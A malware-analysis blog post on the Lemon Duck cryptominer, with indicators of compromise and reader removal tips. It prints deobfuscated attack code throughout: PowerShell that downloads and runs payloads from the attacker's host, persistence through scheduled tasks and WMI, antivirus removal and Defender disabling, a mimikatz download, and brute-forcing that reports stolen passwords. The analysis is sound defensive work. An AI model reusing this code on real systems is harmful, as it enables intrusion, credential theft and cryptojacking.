Lemon-Duck Cryptominer Technical Analysis

This blog post was authored by Fareed.


Lemon Duck is a crypto-mining malware that targets infected computer resources to mine Monero cryptocurrency. This malware has a lot of capabilities and runs its payload mostly in memory which makes its presence stealthy in infected machines. The fileless infection of the malware is mainly using PowerShell modules. Phishing emails with a malicious document, SMB Remote Code Execution Vulnerability (CVE-2017-0144), and brute-force attacks were used to conduct internal network spreading while a malicious document was used to infect external victims. They also leverage some open source tools like XMRig, PingCastle, PowerSploit to achieve their goals.

Initial access

The infection of this crypto miner begin on the victim in many ways.
  • Phishing email with Malicious document as an attachment
  • SMB exploit
  • RDP brute-force
  • USB infection
  • SSH brute-force
  • Pass the hash
  • MS-SQL brute-force
  • Redis remote command
  • Yarn remote command

Our Splunk detection team first detect a lot of suspicious communication were made to a domain name t[.]bb3u9[.]com as shown in below:

Our threat analyst team investigate the URL and realized that the URL is appended a lot of computer information include Windows version, hostname, and many more, which in our case, the infected victim information.

Using VTGraph from VirusTotal, the domain was flagged as malicious by various security vendors. The domain also has communicated with a lot of malicious files which confirmed that the domain is malicious.

Figure 1: VTGraph result of domain t[.]bb3u9[.]com

Tracking and hunting down the domain and few indicators of initial access in Splunk, we found that the malware was spread through Pass the hash method.

Which execution made the above request?

After conducting a malware analysis on the sample, we observed that the above-mentioned request was made after the execution of a persistence mechanism PowerShell from Scheduler Task. The below figure shows scheduler task was created by the malware.

Figure 2: Lemon Duck's scheduler task in our Windows VM analysis

The format version of the Powershell code as below:
function a($u){
    $d=(Ne`w-Obj`ect Net.WebC`lient).DownloadData($u);
    if($c -gt 173){
        $p=New-Object Security.Cryptography.RSAParameters;
        $r=New-Object Security.Cryptography.RSACryptoServiceProvider;
        if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){            
a($url+'/a.jsp?rep_20210521?'+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join'*'))
The above code will execute the final line of the code which will retrieve the content of a.jsp and invoke the content of a.jsp.

First stager

But, one question that comes across in our mind is how the scheduler task was created?

Our analyst then tracks the malware behavior based on the malware sample analysis and found out that the first stager PowerShell script from the malware does these scheduler task creation things.

The following snippet decoded version of PowerShell code shows the full line of scheduler task payload is stored in variable $tmps.
$tmps='function a($u){$d=(Ne`w-Obj`ect Net.WebC`lient)."DownloadData"($u);$c=$d.count;if($c -gt 173){$b=$d[173..$c];$p=New-Object Security.Cryptography.RSAParameters;$p.Modulus=[convert]::FromBase64String(''xpVT7bCpITDUjAvmzli55WPVFPjQBos7o9/ZbbWzyeaKIn9NLJwvY6ad3rMGoXzT6mz+51VupKm5TQvk79oVK4QQDZErhr0szpUdW79j2WPhbmpZrwMdgmFHrqG6Np+InWy/V1acp09/W9x54mpQ1EHIos1+JhSrYPaq8WtsGW0='');$p.Exponent=0x01,0x00,0x01;$r=New-Object Security.Cryptography.RSACryptoServiceProvider;$r.ImportParameters($p);if($r.verifyData($b,(New-Object Security.Cryptography.SHA1CryptoServiceProvider),[convert]::FromBase64String(-join([char[]]$d[0..171])))){I`ex(-join[char[]]$b)}}}$url=''http://''+''U1''+''U2'';a($url+''/a.jsp'+$v+'?''+(@($env:COMPUTERNAME,$env:USERNAME,(get-wmiobject Win32_ComputerSystemProduct).UUID,(random))-join''*''))'
	schtasks /create /ru system /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
} else {
	schtasks /create /sc MINUTE /mo 60 /tn "$tnf\$tn" /F /tr "powershell -w hidden -c PS_CMD"
$folder.RegisterTask($task.Name, $task.Xml.replace("PS_CMD",$tmps.replace('U1',$u.substring(0,5)).replace('U2',$u.substring(5))), 4, $null, $null, 0, $null)|out-null
The stager also drops WMI persistent mechanism.
Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="blackball1";EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop
foreach($u in $us){
Set-WmiInstance -Class __FilterToConsumerBinding -Namespace "root\subscription" -Arguments @{Filter=(Set-WmiInstance -Class __EventFilter -NameSpace "root\subscription" -Arguments @{Name="f"+$theName;EventNameSpace="root\cimv2";QueryLanguage="WQL";Query="SELECT * FROM __InstanceModificationEvent WITHIN 3600 WHERE TargetInstance ISA 'Win32_PerfFormattedData_PerfOS_System'";} -ErrorAction Stop);Consumer=(Set-WmiInstance -Class CommandLineEventConsumer -Namespace "root\subscription" -Arguments @{Name="c"+$theName;ExecutablePath="c:\windows\system32\cmd.exe";CommandLineTemplate="/c powershell -w hidden -c $wmicmd"})}

Other things to highlight for the first stager are few interesting functions like for example, Uninstall AV, Verify the current hostname has been infected or not, and deny access on ports 445 and 135.

The below snippet code shows the malware that uses the WMIC utility program to perform uninstallation of Anti Virus includes Eset, Avast, and many more.
cmd.exe /c start /b wmic.exe product where "name like '%Eset%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%%Kaspersky%%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avast%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%avp%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%Security%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%AntiVirus%'" call uninstall /nointeractive
cmd.exe /c start /b wmic.exe product where "name like '%Norton Security%'" call uninstall /nointeractive
cmd.exe /c "C:\Progra~1\Malwarebytes\Anti-Malware\unins000.exe" /verysilent /suppressmsgboxes /norestart
cmd.exe /c rem https://technet.microsoft.com/en-us/itpro/powershell/windows/defender/set-mppreference
cmd.exe /c rem To also disable Windows Defender Security Center include this
cmd.exe /c rem cmd.exe /c reg add "HKLM\System\CurrentControlSet\Services\SecurityHealthService" /v "Start" /t REG_DWORD /d "4" /f
cmd.exe /c rem 1 - Disable Real-time protection
cmd.exe /c reg delete "HKLM\Software\Policies\Microsoft\Windows Defender" /f
cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiSpyware" /t REG_DWORD /d "1" /f
cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender" /v "DisableAntiVirus" /t REG_DWORD /d "1" /f
cmd.exe /c reg add "HKLM\Software\Policies\Microsoft\Windows Defender\MpEngine" /v "MpEnablePus" /t REG_DWORD /d "0" /f
The PowerShell code then will prepare a network environment such as deny access on ports 445 and 135 so that other malware can exploit SMB with the Eternal Blue exploit.
cmd.exe /c netsh.exe firewall add portopening tcp 65529 SDNSd
netsh.exe interface portproxy add v4tov4 listenport=65529 connectaddress= connectport=53
netsh advfirewall firewall add rule name="deny445" dir=in protocol=tcp localport=445 action=block
netsh advfirewall firewall add rule name="deny135" dir=in protocol=tcp localport=135 action=block
So, after the first stager is executed, it will set up the environment for the malware such as removing AV, deny access on port SMB and drop the persistent mechanism. Once the persistent PowerShell payload is executed, the malware then will retrieve and invoke the PowerShell command in the JSP file a.jsp.

Deobfuscating a.jsp

The content of a.jsp again was multi-encoded by the malware author.
I`EX $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$('edbd07601c499625262f6dca7b7f4af54ad7e074a10880601324d8904010ecc188cde692ec1d69472329ab2a81ca6556655d661640cced9dbcf7de7befbdf7de7befbdf7ba3b9d4e27f7dfff3f5c6664016cf6ce4adac99e2180aac81f3f7e7c
6f5334f6bbfdfebfe4ce271fa5bfdb56dafc64fa71f5ac21564f3fbef3d1cf8cd3adad0bfae85b8ba7f5b73ebe337e71bc38fdde3d20b7f7fdedef7c59bcf8f8e33bbf71f2ff00'-split'(..)'|?{$_}|%{[convert]::ToUInt32($_,16)}))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();
Using PowerShell ISE, we then decode the above-encoded code to analyze the clean version of the payload just like we did with the first stager. The deobfuscation progress is shown from figure 3 to 6:

Figure 3: First version of decoded payload

Figure 4: Second version of decoded payload

Figure 5: Third version of decoded payload

Figure 6: Final and clean version of decoded payload

After deobfuscation, the script becomes readable. We gonna highlight only important codes of the payload.

Collect information about the infected environment and store each of the values in variables.
$down_url = "http://d.u78wjdu.com"
$core_url = $url.split("/")[0..2]-join"/"
$permit = ([Security.Principal.WindowsPrincipal][Security.Principal.WindowsIdentity]::GetCurrent()).IsInRole([Security.Principal.WindowsBuiltInRole] "Administrator")
$comp_name = $env:COMPUTERNAME
$guid = (get-wmiobject Win32_ComputerSystemProduct).UUID
$mac = (Get-WmiObject Win32_NetworkAdapterConfiguration | where {$_.ipenabled -EQ $true}).Macaddress | select-object -first 1
$osb = (Get-WmiObject -class Win32_OperatingSystem)
$os = $osb.Caption.replace("Microsoft Windows ","")+"_"+$osb.Version
$user = $env:USERNAME
$domain = (Get-WmiObject win32_computersystem).Domain
$uptime = [timespan]::FromMilliseconds([environment]::TickCount)|foreach{$_.totalseconds}
$card = (Get-WmiObject Win32_VideoController).name
$cpu_per = "$((Get-WmiObject -Class Win32_Processor).LoadPercentage)"
gwmi Win32_PhysicalMemory | %{$msum = 0} { $msum += $_.Capacity };$mem=$msum/1Gb
The malware download and runs various payloads called m6.bin, m6g.bin, kr.bin, if.bin, and nvd.zip into the disk.
function stp($gra){
    write-host $gra
	Start-Process -FilePath cmd.exe -ArgumentList "/c $gra"
function gcf($code,$md,$fn){
	('echo '+$code+';$ifmd5='''+$md+''';$ifp=$env:tmp+''\'+$fn+''';$down_url='''+$down_url+''';function gmd5($con){[System.Security.Cryptography.MD5]::Create().ComputeHash($con)|foreach{$s+=$_.ToString(''x2'')};return $s}if(test-path $ifp){$con_=[System.IO.File]::ReadAllBytes($ifp);$md5_=gmd5 $con_;if($md5_-eq$ifmd5){$noup=1}}if(!$noup){$con=(Ne`w-Obj`ect Net.WebC`lient).downloaddata($down_url+''/'+$fn+'?'+$params+''');$t=gmd5 $con;if($t-eq$ifmd5){[System.IO.File]::WriteAllBytes($ifp,$con)}else{$noup=1}}if($noup){$con=$con_;$ifmd5=$md5_}').replace('|','^^^|').replace('&','^^^&')
function gpa($fnam,$name){
	('for($i=0;$i -lt $con.count-1;$i+=1){if($con[$i] -eq 0x0a){break}};i`ex(-join[char[]]$con[0..$i]);$bin=(New-Object IO.BinaryReader(New-Object System.IO.Compression.GzipStream (New-Object System.IO.MemoryStream(,$con[($i+1)..($con.count)])), ([IO.Compression.CompressionMode]::Decompress))).ReadBytes(10000000);$bin_=$bin.Clone();$mep=$env:tmp+'''+"\$fnam.ori"+''';[System.IO.File]::WriteAllBytes($mep,$bin_+((1..127)|Get-Random -Count 100));test1 -PEBytes $bin').replace('|','^^^|').replace('&','^^^&')+"|$name - &cmd /c copy /y %tmp%\$fnam.ori %tmp%\$fnam.exe & %tmp%\$fnam.exe"
function gpb($name){
    'I`EX(-join[char[]]$con)|'+$name+' -'
function gcode($fl) {
	'try{$local'+$fl+'=$flase;New-Object Threading.Mutex($true,''Global\eLocal'+$fl+''',[ref]$local'+$fl+')}catch{}'
$code1=gcode "If"
I`Ex $code1
	stp ((gcf $code1 $ifmd5 $ifbin)+(gpb $rename))
	$code2=gcode "TMn"
	I`Ex $code2
		stp ((gcf $code2 $mmd5 $mbin)+(gpa $mbin $rename))
if(($isn -or $isa) -and $is64){
	$code3=gcode "TMng"
	I`Ex $code3
		stp ((gcf $code3 $mgmd5 $mgbin)+(gpa $mgbin $rename))
$code4=gcode "Kr"
I`Ex $code4
	stp ((gcf $code4 $krmd5 $krbin)+(gpb $rename))
Function SIEX act as communication for CnC function code. When communicating with the attacker, the script sends a long URL containing all the information gathered about the environment, uniquely identifying the infected machine.
function SIEX {  
		$webclient = Ne`w-Obj`ect Net.WebC`lient
		$finalurl = "$url"+"?"+"$params"
		} catch{}
		$res_bytes = $webclient.DownloadData($finalurl)
		if($res_bytes.count -gt 173){
			$sign_bytes = $res_bytes[0..171];
			$raw_bytes = $res_bytes[173..$res_bytes.count];
			$rsaParams = New-Object System.Security.Cryptography.RSAParameters
			$rsaParams.Modulus = 0xda,0x65,0xa8,0xd7,0xbb,0x97,0xbc,0x6d,0x41,0x5e,0x99,0x9d,0x82,0xff,0x2f,0xff,0x73,0x53,0x9a,0x73,0x6e,0x6c,0x7b,0x55,0xeb,0x67,0xd6,0xae,0x4e,0x23,0x3c,0x52,0x3d,0xc0,0xcd,0xcd,0x37,0x6b,0xf3,0x4f,0x3b,0x62,0x70,0x86,0x07,0x96,0x6e,0xca,0xde,0xbd,0xa6,0x4f,0xf6,0x11,0xd1,0x60,0xdc,0x88,0xbf,0x35,0xf2,0x92,0xee,0x6c,0xb8,0x2e,0x9b,0x7d,0x2b,0xd1,0x19,0x30,0x73,0xc6,0x52,0x01,0xcd,0xe7,0xc7,0x34,0x78,0x8a,0xa7,0x9f,0xe2,0x12,0xcd,0x79,0x40,0xa7,0x91,0x6a,0xae,0x95,0x8e,0x42,0xd0,0xcf,0x39,0x6e,0x30,0xcb,0x0a,0x98,0xdb,0x97,0x3f,0xf6,0x2e,0x95,0x10,0x72,0xfd,0x63,0xd5,0xf7,0x88,0x63,0xa4,0x7b,0xae,0x97,0xea,0x38,0xb7,0x47,0x6b,0x5d
			$rsaParams.Exponent = 0x01,0x00,0x01
			$rsa = New-Object -TypeName System.Security.Cryptography.RSACryptoServiceProvider;
			$base64 = -join([char[]]$sign_bytes)
			$byteArray = [convert]::FromBase64String($base64)
			$sha1 = New-Object System.Security.Cryptography.SHA1CryptoServiceProvider
			if($rsa.verifyData($raw_bytes,$sha1,$byteArray)) {
				IEX (-join[char[]]$raw_bytes)
	} catch{}}
Start-Sleep -Seconds 3
SIEX "$core_url/report.jsp"
All downloaded payload were downloaded in the temp folder, which we can see on the figure below:
Figure 7: payloads downloaded in temp folder

Analyzing if.bin

If.bin also has been obfuscated by the author.
Figure 8: Obfuscated script

We did the deobfuscation process and the script will be readable as shown in the figure below:

Figure 9: Deobfuscated script

Few important capabilities of the malicious files will explain below.

First, the code containing PingCastle module which being use for port scanning to detect machines the respond on port 445. Thus, this will then launch SMB exploit on that scanned port. Snippet code as below:
namespace PingCastle.Scanners
	public class m17sc
		static public bool Scan(string computer)
			TcpClient client = new TcpClient();
			client.Connect(computer, 445);
				NetworkStream stream = client.GetStream();
				byte[] negotiatemessage = GetNegotiateMessage();
				stream.Write(negotiatemessage, 0, negotiatemessage.Length);
				byte[] response = ReadSmbResponse(stream);
				if (!(response[8] == 0x72 && response[9] == 00)){
				throw new InvalidOperationException("invalid negotiate response");}
				byte[] sessionSetup = GetR(response);
<-- snippet -->
RDP brute-forcing module is included to perform RDP brute force capability.
namespace RDP
    public class BRUTE
		private int flag1=-1;
		private bool check_login;
		private Process process;
		public void exit(){
        public int check(string exePath, string ip, string user, string pass, bool checklogin){	
				check_login = checklogin;
				process = new System.Diagnostics.Process();
				process.StartInfo.FileName = exePath;
					process.StartInfo.Arguments = "/u:"+user+" /p:"+pass+" /cert-ignore /sec:nla /log-level:trace /size:700x700 /v:"+ip;
				} else {
					process.StartInfo.Arguments = "/u:"+user+" /p:"+pass+" /cert-ignore +auth-only /sec:nla /log-level:trace /v:"+ip;}
				process.StartInfo.UseShellExecute = false;
				process.StartInfo.CreateNoWindow = true;
				process.StartInfo.RedirectStandardOutput = true;
				process.OutputDataReceived += new DataReceivedEventHandler(processOutputDataReceived);
                System.Threading.Timer timer = new System.Threading.Timer(autoQuite, null, 10000, 5000);
<-- snippet -->
Another infection method is via network drives and removable drives. It will create a .lnk file on these detected drives and execute the payload in the shortcut lnk.
public class USBLNK
        public static List blacklist = new List();
		public static string gb3;
		public static string gb6;
		public static string jsdata;
        const string home = "UTFsync";
        const string inf_data = "\\inf_data"
<-- snippet -->
		static bool IsSupported(DriveInfo drive) { return drive.IsReady && drive.AvailableFreeSpace > 1024 && (drive.DriveType == DriveType.Removable || drive.DriveType == DriveType.Network) && (drive.DriveFormat == "FAT32" || drive.DriveFormat == "NTFS");}
		static bool CheckBlacklist(string name) { return name==home || name=="System Volume Information" || name=="$RECYCLE.BIN";}
		static bool Infect(string drive)
            if (blacklist.Contains(drive)) {return true;}
			CreateLnk(drive, "blue3.bin", gb3);
			CreateLnk(drive, "blue6.bin", gb6);
			CreateJs(drive, "readme.js", jsdata);
                File.Create(drive + home + inf_data);
                return true;};
Powerdump module being used to dumps hashes from the local system
#######################################powerdump written by David Kennedy#########################################
$antpassword = [Text.Encoding]::ASCII.GetBytes("NTPASSWORD0");
$almpassword = [Text.Encoding]::ASCII.GetBytes("LMPASSWORD0");
$empty_lm = [byte[]]@(0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee,0xaa,0xd3,0xb4,0x35,0xb5,0x14,0x04,0xee);
$empty_nt = [byte[]]@(0x31,0xd6,0xcf,0xe0,0xd1,0x6a,0xe9,0x31,0xb7,0x3c,0x59,0xd7,0xe0,0xc0,0x89,0xc0);
$odd_parity = @(
  1, 1, 2, 2, 4, 4, 7, 7, 8, 8, 11, 11, 13, 13, 14, 14,
  16, 16, 19, 19, 21, 21, 22, 22, 25, 25, 26, 26, 28, 28, 31, 31,
  32, 32, 35, 35, 37, 37, 38, 38, 41, 41, 42, 42, 44, 44, 47, 47,
  49, 49, 50, 50, 52, 52, 55, 55, 56, 56, 59, 59, 61, 61, 62, 62,
  64, 64, 67, 67, 69, 69, 70, 70, 73, 73, 74, 74, 76, 76, 79, 79,
  81, 81, 82, 82, 84, 84, 87, 87, 88, 88, 91, 91, 93, 93, 94, 94,
  97, 97, 98, 98,100,100,103,103,104,104,107,107,109,109,110,110,
  <-- snippet -->
The script trying to get mimi.dat file which contain mimikatz payload.
$mimipath = $env:tmp+'\mimi.dat'
while(!(Test-Path $mimipath) -or (Get-Item $mimipath).length -ne 3563487){
	if($d_retry -eq 0){break}
	write-host "try to get mimi..."
	try{(new-object System.Net.WebClient).DownloadFile($down_url+"/mimi.dat?v=$VVERSION&r=$d_retry",$mimipath)}catch{}
	start-sleep 3
<-- snippet -->
Another capability to highlight is MS-SQL brute-forcing code. It will attempt to brute force MS-SQL to gain access.
write-host "start mssql port open scanning..."
$ms_portopen = localscan -port 1433 -addresses $ipaddresses[$i..($i+$tcount-1)]
$old_portopen = localscan -port 65529 -addresses $ms_portopen[1]
foreach($currip in $ms_portopen[1]) {
	if (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){
		write-host "start mssql burping...$currip"
		for($n=0; $n -lt $allpass.count; $n++){
			write-host("Try pass: "+$allpass[$n])
			$flag,$banner = (mssqlrun -ip $currip -pass $allpass[$n] -cmd $mscmd_code -cmd1 $mscmd_code)[-2..-1]
			if($flag) {
				try{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$VVERSION+'&type=ms&iip='+$internet_ip+'&ip='+$currip+'&pass='+$allpass[$n]+'&t='+$t+'&b='+$banner)}catch{}
 <-- snippet -->                   
Same goes to SSH bruteforce as shown below:
write-host "start ssh port open scanning..."
$ssh_portopen = localscan -port 22 -addresses $ipaddresses[$i..($i+$tcount-1)]
$old_portopen = localscan -port 65529 -addresses $ssh_portopen[1]
foreach($currip in $ssh_portopen[1]) {
	if (($old_portopen[1] -notcontains $currip) -and ($currip.length -gt 6)){
		write-host "start ssh burping...$currip"
		foreach($password in $allpass){
			write-host "Try pass:$password"
			$flag1 = -1
			$flag1 = sshbrute $currip "root" $password $ssh_code
			if($flag1 -eq 1){
			write-host "SUCC!!"
			try{(New-Object Net.WebClient).DownloadString($down_url+'/report.json?v='+$VVERSION+'&type=ssh&iip='+$internet_ip+'&ip='+$currip+'&pass='+$password+'&t='+$t)}catch{}
<-- snippet -->


m6.bin is the executable that uses for the crypto miner. From the below-executed executable, the version of XMRig is 6.3.0.

Figure 10: XMRig


The malware is very stealthy as they leverage fileless execution on most of their payloads. The malware tends to infect and spread as many systems as possible as they implement multiple methods like brute force and exploit. Observing these malware trends shows that the malware author often changes the CnC infrastructure IP address and improves their malware capabilities. Thus, makes more system as their victims.

Indicator of Compromise


  • if.bin 8c4fba3df81475d075c535deae2cd373
  • kr.bin c95f97fccb0bd80fa524cf2bfb0390a8
  • m6.exe 4094140d07826334c345f8dc392d8fe3
  • mimi.dat a66953b8a3eeee7d5057ddf80b8be962

DNS request

  • t.bb3u9.com
  • t.pp6r1.com
  • p.b69kq.com
  • d.u78wjdu.com

IP connections


Extra (Deobfucation)

Shout out to our internship students who managed to deobfuscate the obfuscated Powershell. Below is the links of their write-ups:


  1. How to remove it? thanks so much

    1. Hi. As far as I know.

      You may first remove the persistent mechanism of the malware by using tool like Autoruns from Windows Sysinternal. Identify it at Schedule Task and WMIC tab.

      Then, remove any malicious files related to Lemon Duck reside in %Temp% directory if the files still in there.

      Third, you may use AV scanner like BitDefender free to scan your machine and remove it.

    2. THOR scanner also can be helpful to locate malicious program in computer.


Post a Comment